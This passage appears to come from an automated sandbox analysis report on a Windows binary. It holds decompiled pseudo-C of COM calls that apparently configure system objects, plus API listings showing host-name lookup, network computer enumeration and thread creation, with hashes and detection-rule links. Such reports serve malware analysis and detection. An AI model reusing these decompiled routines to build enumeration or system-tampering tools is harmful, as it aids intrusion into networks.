				_t80 =  &_v16;
				_t185 = 0;
				_v12 = 0;
				_v8 = 0;
				_v16 = 0;
				__imp__CoCreateInstance(0x7098d47c, 0, 1, 0x7098d43c, _t80); // executed
				if(_t80 < 0) {
					L35:
					return _v32;
				}
				_t82 = _v36;
				_v24 = 0;
				_t84 =  *((intOrPtr*)( *((intOrPtr*)( *_t82 + 0x1c))))(_t82,  &_v24, _t187, _t192); // executed
				if(_t84 < 0) {
					L10:
					_t85 = _v44;
					_v52 = _t185;
					_push( &_v52);
					_push(_t85);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t85 + 0x48))))() < 0) {
						L34:
						_t88 = _v52;
						 *((intOrPtr*)( *((intOrPtr*)( *_t88 + 8))))(_t88);
						if(_v48 != _t185) {
							return 1;
						}
						goto L35;
					}
					_t138 = __imp__#2;
					_t194 =  *_t138(_v28);
					if(_t194 == _t185) {
						L33:
						_t92 = _v64;
						 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 8))))(_t92);
						goto L34;
					}
					_t186 =  *_t138(_v28);
					_t189 = 0;
					if(_t186 == 0) {
						L32:
						__imp__#6(_t194);
						_t185 = 0;
						goto L33;
					}
					_t95 = _v68;
					_v64 = 0;
					_t97 =  *((intOrPtr*)( *((intOrPtr*)( *_t95 + 0x28))))(_t95, _t186,  &_v64); // executed
					if(_t97 < 0) {
						L21:
						if(_v52 != _t189) {
							_t98 =  &_v84;
							_v84 = _t189;
							__imp__CoCreateInstance(0x7098d45c, _t189, 1, 0x7098d42c, _t98); // executed
							if(_t98 >= 0) {
								_t99 = _v60;
								if(_t99 != 0) {
									_t189 =  *_t138(_t99);
								}
								_t100 = _v104;
								 *((intOrPtr*)( *((intOrPtr*)( *_t100 + 0x30))))(_t100, _t194); // executed
								_t102 = _v112;
								 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 0x20))))(_t102, _t186);
								if(_t189 != 0) {
									_t117 = _v120;
									 *((intOrPtr*)( *((intOrPtr*)( *_t117 + 0x28))))(_t117, _t189);
								}
								_t104 = _v120;
								 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 0x40))))(_t104, 0x100);
								_t106 = _v128;
								 *((intOrPtr*)( *((intOrPtr*)( *_t106 + 0x98))))(_t106, 0x7fffffff);
								_t108 = _v136;
								 *((intOrPtr*)( *((intOrPtr*)( *_t108 + 0xa8))))(_t108, 1);
								_t110 = _v144;
								 *((intOrPtr*)( *((intOrPtr*)( *_t110 + 0x88))))(_t110, 0xffffffff);
								_t112 = _v148;
								_t114 =  *((intOrPtr*)( *((intOrPtr*)( *_t112 + 0x20))))(_t112, _v152); // executed
								if(_t114 >= 0) {
									_v144 = 1;
								}
								_t115 = _v160;
								 *((intOrPtr*)( *((intOrPtr*)( *_t115 + 8))))(_t115);
								if(_t189 != 0) {
									__imp__#6(_t189);
								}
							}
						}
						L31:
						__imp__#6(_t186);
						goto L32;
					}
					_t120 = _v76;
					_v84 = 0;
					 *((intOrPtr*)( *((intOrPtr*)( *_t120 + 0x2c))))(_t120,  &_v84);
					_t123 = lstrcmpiW(_t194, _v92);
					_t190 = _v44;
					if(_t123 == 0) {
						if(_t190 == 0) {
							_t130 = _v84;
							_v76 = _t190;
							 *((intOrPtr*)( *((intOrPtr*)( *_t130 + 0x84))))(_t130,  &_v76);
							if(_v84 == _t190) {
								_t132 = _v92;
								 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0x88))))(_t132, 0xffffffff);
							}
						}
						_v76 = 1;
					}
					_t124 = _v84;
					 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 8))))(_t124);
					if(_v80 != 0) {
						if(_t190 != 0) {
							_t126 = _v92;
							 *((intOrPtr*)( *((intOrPtr*)( *_t126 + 0x24))))(_t126, _t186);
						}
						goto L31;
					} else {
						_t128 = _v92;
						 *((intOrPtr*)( *((intOrPtr*)( *_t128 + 0x24))))(_t128, _t186);
						_t189 = 0;
						goto L21;
					}
				} else {
					_t191 = 0x7098ca30;
					do {
						_t134 =  *_t191;
						if((_v32 & _t134) == 0) {
							goto L7;
						}
						_t161 = _v44;
						_v36 = _t185;
						_t136 =  *((intOrPtr*)( *((intOrPtr*)( *_t161 + 0x20))))(_t161, _t134,  &_v36); // executed
						if(_t136 < 0 || _v48 != _t185) {
							_v48 = _t185;
							goto L10;
						} else {
							_v48 = 1;
						}
						L7:
						_t191 =  &(_t191[1]);
					} while (_t191 < 0x7098ca3c);
					goto L10;
				}
			}




































































                                                                                                        0x70984a95
                                                                                                        0x70984a9f
                                                                                                        0x70984aad
                                                                                                        0x70984ab1
                                                                                                        0x70984ab5
                                                                                                        0x70984ab9
                                                                                                        0x70984ac1
                                                                                                        0x70984d2b
                                                                                                        0x00000000
                                                                                                        0x70984d2b
                                                                                                        0x70984ac7
                                                                                                        0x70984ad1
                                                                                                        0x70984adc
                                                                                                        0x70984ae0
                                                                                                        0x70984b25
                                                                                                        0x70984b25
                                                                                                        0x70984b2d
                                                                                                        0x70984b33
                                                                                                        0x70984b34
                                                                                                        0x70984b3c
                                                                                                        0x70984d12
                                                                                                        0x70984d12
                                                                                                        0x70984d1c
                                                                                                        0x70984d29
                                                                                                        0x70984d34
                                                                                                        0x70984d34
                                                                                                        0x00000000
                                                                                                        0x70984d29
                                                                                                        0x70984b46
                                                                                                        0x70984b4f
                                                                                                        0x70984b53
                                                                                                        0x70984d06
                                                                                                        0x70984d06
                                                                                                        0x70984d10
                                                                                                        0x00000000
                                                                                                        0x70984d10
                                                                                                        0x70984b60
                                                                                                        0x70984b62
                                                                                                        0x70984b66
                                                                                                        0x70984cfd
                                                                                                        0x70984cfe
                                                                                                        0x70984d04
                                                                                                        0x00000000
                                                                                                        0x70984d04
                                                                                                        0x70984b6c
                                                                                                        0x70984b75
                                                                                                        0x70984b80
                                                                                                        0x70984b84
                                                                                                        0x70984c15
                                                                                                        0x70984c19
                                                                                                        0x70984c1f
                                                                                                        0x70984c31
                                                                                                        0x70984c35
                                                                                                        0x70984c3d
                                                                                                        0x70984c43
                                                                                                        0x70984c49
                                                                                                        0x70984c4e
                                                                                                        0x70984c4e
                                                                                                        0x70984c50
                                                                                                        0x70984c5b
                                                                                                        0x70984c5d
                                                                                                        0x70984c68
                                                                                                        0x70984c6c
                                                                                                        0x70984c6e
                                                                                                        0x70984c79
                                                                                                        0x70984c79
                                                                                                        0x70984c7b
                                                                                                        0x70984c8a
                                                                                                        0x70984c8c
                                                                                                        0x70984c9e
                                                                                                        0x70984ca0
                                                                                                        0x70984caf
                                                                                                        0x70984cb1
                                                                                                        0x70984cc0
                                                                                                        0x70984cc2
                                                                                                        0x70984cd1
                                                                                                        0x70984cd5
                                                                                                        0x70984cd7
                                                                                                        0x70984cd7
                                                                                                        0x70984cdf
                                                                                                        0x70984ce9
                                                                                                        0x70984ced
                                                                                                        0x70984cf0
                                                                                                        0x70984cf0
                                                                                                        0x70984ced
                                                                                                        0x70984c3d
                                                                                                        0x70984cf6
                                                                                                        0x70984cf7
                                                                                                        0x00000000
                                                                                                        0x70984cf7
                                                                                                        0x70984b8a
                                                                                                        0x70984b92
                                                                                                        0x70984b9d
                                                                                                        0x70984ba5
                                                                                                        0x70984bab
                                                                                                        0x70984bb1
                                                                                                        0x70984bb5
                                                                                                        0x70984bb7
                                                                                                        0x70984bbf
                                                                                                        0x70984bcd
                                                                                                        0x70984bd4
                                                                                                        0x70984bd6
                                                                                                        0x70984be5
                                                                                                        0x70984be5
                                                                                                        0x70984bd4
                                                                                                        0x70984be7
                                                                                                        0x70984be7
                                                                                                        0x70984bef
                                                                                                        0x70984bf9
                                                                                                        0x70984c00
                                                                                                        0x70984d37
                                                                                                        0x70984d39
                                                                                                        0x70984d44
                                                                                                        0x70984d44
                                                                                                        0x00000000
                                                                                                        0x70984c06
                                                                                                        0x70984c06
                                                                                                        0x70984c11
                                                                                                        0x70984c13
                                                                                                        0x00000000
                                                                                                        0x70984c13
                                                                                                        0x70984ae2
                                                                                                        0x70984ae2
                                                                                                        0x70984ae7
                                                                                                        0x70984ae7
                                                                                                        0x70984aed
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70984aef
                                                                                                        0x70984af8
                                                                                                        0x70984b03
                                                                                                        0x70984b07
                                                                                                        0x70984b21
                                                                                                        0x00000000
                                                                                                        0x70984b10
                                                                                                        0x70984b10
                                                                                                        0x70984b10
                                                                                                        0x70984b14
                                                                                                        0x70984b14
                                                                                                        0x70984b17
                                                                                                        0x00000000
                                                                                                        0x70984ae7

                                                                                                        APIs
                                                                                                        • CoCreateInstance.OLE32(7098D47C,00000000,00000001,7098D43C,?,00000001,?,?,70984FB8,00000001,?,?,?,?), ref: 70984AB9
                                                                                                        • SysAllocString.OLEAUT32(?), ref: 70984B4D
                                                                                                        • SysAllocString.OLEAUT32(?), ref: 70984B5E
                                                                                                        • lstrcmpiW.KERNEL32(00000000,?,?,70984FB8,00000001,?,?,?,?), ref: 70984BA5
                                                                                                        • CoCreateInstance.OLE32(7098D45C,00000000,00000001,7098D42C,?,?,70984FB8,00000001,?,?,?,?), ref: 70984C35
                                                                                                        • SysAllocString.OLEAUT32(?), ref: 70984C4C
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 70984CF0
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 70984CF7
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 70984CFE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: String$AllocFree$CreateInstance$lstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 1501015606-0
                                                                                                        • Opcode ID: 88e7900b9ab324498d5f910f1906ba44e0488b835761e2a562da47317243b6b7
                                                                                                        • Instruction ID: 306eb9c7c722faa8ba6ecffd8d8c30aca9bfc2149c3d969265f7c6681bd7bfb4
                                                                                                        • Opcode Fuzzy Hash: 88e7900b9ab324498d5f910f1906ba44e0488b835761e2a562da47317243b6b7
                                                                                                        • Instruction Fuzzy Hash: CB91E6B56047119FC200DF69C880E5BB7E9BFC8644F104A5CF99A9B3A0DB75E846CB62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00542E64, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(00000000,00542ED9,00000000,005540AE,00000000,00000000,00000314,?,?,?,00899BB8,00542D81,00899BB8,Microsoft Visual C++ Runtime Library,00012010), ref: 00542E71
                                                                                                        • TlsGetValue.KERNEL32(00000005,?,?,?,00899BB8,00542D81,00899BB8,Microsoft Visual C++ Runtime Library,00012010), ref: 00542E88
                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00899BB8,00542D81,00899BB8,Microsoft Visual C++ Runtime Library,00012010), ref: 00542E9D
                                                                                                        • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00542EB8
                                                                                                        • RtlEncodePointer.NTDLL(?,?,?,?,00899BB8,00542D81,00899BB8,Microsoft Visual C++ Runtime Library,00012010), ref: 00542EC6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Value$AddressEncodeHandleModulePointerProc
                                                                                                        • String ID: EncodePointer$KERNEL32.DLL
                                                                                                        • API String ID: 3030820695-3682587211
                                                                                                        • Opcode ID: 3c1b2cc9ebb13ff48419e98e0aa28776d5d5d2e560a5a0a2d62f95d7005b5ed6
                                                                                                        • Instruction ID: c32475e9bb3011c43e3d726bfe0c4be720bbed855a4fa3e209220d96b0486d0c
                                                                                                        • Opcode Fuzzy Hash: 3c1b2cc9ebb13ff48419e98e0aa28776d5d5d2e560a5a0a2d62f95d7005b5ed6
                                                                                                        • Instruction Fuzzy Hash: 6FF090305006239B8B21AB26DC049FB3EACBF05369F948521F818E32B4DB30DD528E61
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004BB05F, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004BB07E
                                                                                                        • _memset.LIBCMT ref: 004BB09B
                                                                                                        • gethostname.WS2_32(00000000,00000100), ref: 004BB0AC
                                                                                                        • gethostbyname.WS2_32(00000000), ref: 004BB0BE
                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004EA1FF,00000004,004E8E44,0000002C,004E9245,?,?,?,00000000,?,?), ref: 004A17A0
                                                                                                          • Part of subcall function 004A32EF: __EH_prolog3.LIBCMT ref: 004A32F6
                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004E90F2,00000000,?,?,?,?,?,?,?,?,Default,?,?), ref: 004A1C05
                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,Default,?,?,?,?,00000000,?,?), ref: 004A1C45
                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,00506D61,?,PingThread,00000000,00000068), ref: 004A17DC
                                                                                                        • inet_ntoa.WS2_32(?), ref: 004BB138
                                                                                                        Strings
                                                                                                        • GetHostIP: gethostname failed: , xrefs: 004BB1B0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CriticalSection$DeleteEnterInitializeLeave_memsetgethostbynamegethostnameinet_ntoa
                                                                                                        • String ID: GetHostIP: gethostname failed:
                                                                                                        • API String ID: 3857270832-1828764501
                                                                                                        • Opcode ID: d40ffb556d9045b91bc2530ec4333872909f4d4d4e7b2a93456a691941589ecd
                                                                                                        • Instruction ID: 349d24c978153597acb0d294641d772a813f79802d0ed2e9a0d1a9c9ba429b22
                                                                                                        • Opcode Fuzzy Hash: d40ffb556d9045b91bc2530ec4333872909f4d4d4e7b2a93456a691941589ecd
                                                                                                        • Instruction Fuzzy Hash: 6251A171C00148AFDB10EFA8C856AEDBBB4AF65304F14415EE052AB291EBB85B08C7A5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0050C179, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 123COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 0050C180
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,00506D61,?,PingThread,00000000,00000068), ref: 004A17DC
                                                                                                        • _memset.LIBCMT ref: 0050C1EF
                                                                                                          • Part of subcall function 0050BFDE: __EH_prolog3_catch.LIBCMT ref: 0050BFE5
                                                                                                          • Part of subcall function 0050BFDE: WNetOpenEnumW.MPR(?,?,?,?,?), ref: 0050C04A
                                                                                                          • Part of subcall function 0050BFDE: SetLastError.KERNEL32(00000000,00000060,0050C216,00000000,00000002), ref: 0050C059
                                                                                                          • Part of subcall function 0050BFDE: WNetEnumResourceW.MPR(?,00000001,00000000,00000002), ref: 0050C06B
                                                                                                          • Part of subcall function 0050BFDE: WNetCloseEnum.MPR(?), ref: 0050C0AF
                                                                                                          • Part of subcall function 00533B15: __lock.LIBCMT ref: 0053479F
                                                                                                          • Part of subcall function 00533B15: ___sbh_find_block.LIBCMT ref: 005347AA
                                                                                                          • Part of subcall function 00533B15: ___sbh_free_block.LIBCMT ref: 005347B9
                                                                                                          • Part of subcall function 00533B15: HeapFree.KERNEL32(00000000,?,007D55F8,0000000C,0054311C,00000000,?,00000000,005406A9,00539730,00000001,00542E13,?,00000000), ref: 005347E9
                                                                                                          • Part of subcall function 00533B15: GetLastError.KERNEL32(?,00000000,005406A9,00539730,00000001,00542E13,?,00000000,?,?,?,?,00542F25,?,0054292D), ref: 005347FA
                                                                                                          • Part of subcall function 0040E968: __EH_prolog3.LIBCMT ref: 0040E96F
                                                                                                          • Part of subcall function 004C5619: __EH_prolog3_catch.LIBCMT ref: 004C563B
                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004EA1FF,00000004,004E8E44,0000002C,004E9245,?,?,?,00000000,?,?), ref: 004A17A0
                                                                                                          • Part of subcall function 004E19D6: __EH_prolog3.LIBCMT ref: 004E19DD
                                                                                                          • Part of subcall function 004E019F: __EH_prolog3.LIBCMT ref: 004E01AA
                                                                                                          • Part of subcall function 004DE5E2: __EH_prolog3.LIBCMT ref: 004DE5E9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CriticalEnumH_prolog3_catchSection$ErrorInitializeLast$CloseDeleteFreeHeapOpenResource___sbh_find_block___sbh_free_block__lock_memset
                                                                                                        • String ID: CommercialUse$EnumComputers.0$EnumComputers.1$EnumComputersThread
                                                                                                        • API String ID: 1194792939-1530958834
                                                                                                        • Opcode ID: b26faf04b56916e8b258008c5cf400e886ef5e0684d62cb092d5850dd48e0199
                                                                                                        • Instruction ID: 05e0eff4078664633abe1d444c0b6dbc70219798da1c869670169f2c63a0688f
                                                                                                        • Opcode Fuzzy Hash: b26faf04b56916e8b258008c5cf400e886ef5e0684d62cb092d5850dd48e0199
                                                                                                        • Instruction Fuzzy Hash: A541E870900388AADB10EBB58956BEDBFA5BF52308F20456EE1427B2C2DB791F44C756
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004EA042, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 50threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004EA049
                                                                                                        • CreateThread.KERNEL32 ref: 004EA071
                                                                                                        • InterlockedIncrement.KERNEL32(0085F708), ref: 004EA0AA
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 004378AA: __EH_prolog3.LIBCMT ref: 004378B1
                                                                                                        • ResumeThread.KERNEL32(?,0000002C,004DD255,?), ref: 004EA0CD
                                                                                                        Strings
                                                                                                        • Thread.Create.Failed, xrefs: 004EA088
                                                                                                        • CreateThread, not running yet, xrefs: 004EA0B1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$Thread$CreateCriticalIncrementInitializeInterlockedResumeSection
                                                                                                        • String ID: CreateThread, not running yet$Thread.Create.Failed
                                                                                                        • API String ID: 3859527013-1474816145
                                                                                                        • Opcode ID: 1fe241031cbf8dd156f9a015d11bf9e74ddcba9c952d86651aac394ea650b300
                                                                                                        • Instruction ID: 748b0913021fcb97cc79a03ea8ed07f168fa6b075067c64e1e9f7b92f0b2e480
                                                                                                        • Opcode Fuzzy Hash: 1fe241031cbf8dd156f9a015d11bf9e74ddcba9c952d86651aac394ea650b300
                                                                                                        • Instruction Fuzzy Hash: DD110830900241ABDB30EF66DC0996E7F71FF95722F10420EF122961E0DB786901D71A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70986910, Relevance: 9.2, APIs: 6, Instructions: 208comCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 47%
                                                                                                        			E70986910() {
				intOrPtr* _v24;
				intOrPtr _v40;
				void* _v104;
				void* _v112;
				intOrPtr* _v124;
				char _v128;
				intOrPtr _v132;
				WCHAR* _v136;
				intOrPtr* _v140;
				intOrPtr* _v144;
				char _v152;
				intOrPtr* _v160;
				void* _v164;
				intOrPtr _v168;
				intOrPtr* _v180;
				void* _v184;
				intOrPtr* _v192;
				char _v196;
				short _v200;
				char _v204;
				intOrPtr* _v212;
				intOrPtr _v228;
				intOrPtr* _v240;
				intOrPtr* _v248;
				intOrPtr* _v260;
				intOrPtr* _v268;
				intOrPtr* _v280;
				char* _t66;
				intOrPtr* _t68;
				void* _t70;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t83;
				intOrPtr* _t86;
				void* _t88;
				intOrPtr* _t89;
				intOrPtr* _t91;
				void* _t93;
				WCHAR* _t94;
				intOrPtr* _t96;
				intOrPtr* _t99;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t109;
				void* _t111;
				intOrPtr* _t112;
				void* _t114;
				intOrPtr* _t115;
				intOrPtr* _t117;
				WCHAR* _t165;

				_t165 = 0;
				__imp__CoInitializeEx(0, 0);
				_t66 =  &_v104;
				_v104 = 0;
				__imp__CoCreateInstance(0x7098cf4c, 0, 1, 0x7098d16c, _t66); // executed
				if(_t66 < 0) {
					L19:
					__imp__CoUninitialize();
					return _t165;
				}
				_t68 = _v124;
				_v112 = 0;
				_t70 =  *((intOrPtr*)( *((intOrPtr*)( *_t68 + 0x54))))(_t68,  *_v24, 0, 2,  &_v112); // executed
				if(_t70 < 0) {
					L18:
					_t71 = _v144;
					 *((intOrPtr*)( *((intOrPtr*)( *_t71 + 8))))(_t71);
					goto L19;
				}
				_t73 = _v144;
				_v136 = 0;
				_push( &_v136);
				_push(_t73);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t73 + 0x38))))() < 0) {
					L17:
					_t76 = _v140;
					 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 8))))(_t76); // executed
					goto L18;
				}
				_t78 = _v144;
				_push(_v40);
				_push(_t78);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t78 + 0x38))))() < 0) {
					L16:
					_t81 = _v152;
					 *((intOrPtr*)( *((intOrPtr*)( *_t81 + 8))))(_t81);
					goto L17;
				}
				asm("movq xmm0, [0x7098cf5c]");
				_t83 = _v160;
				_push( &_v164);
				asm("movq [esp+0x30], xmm0");
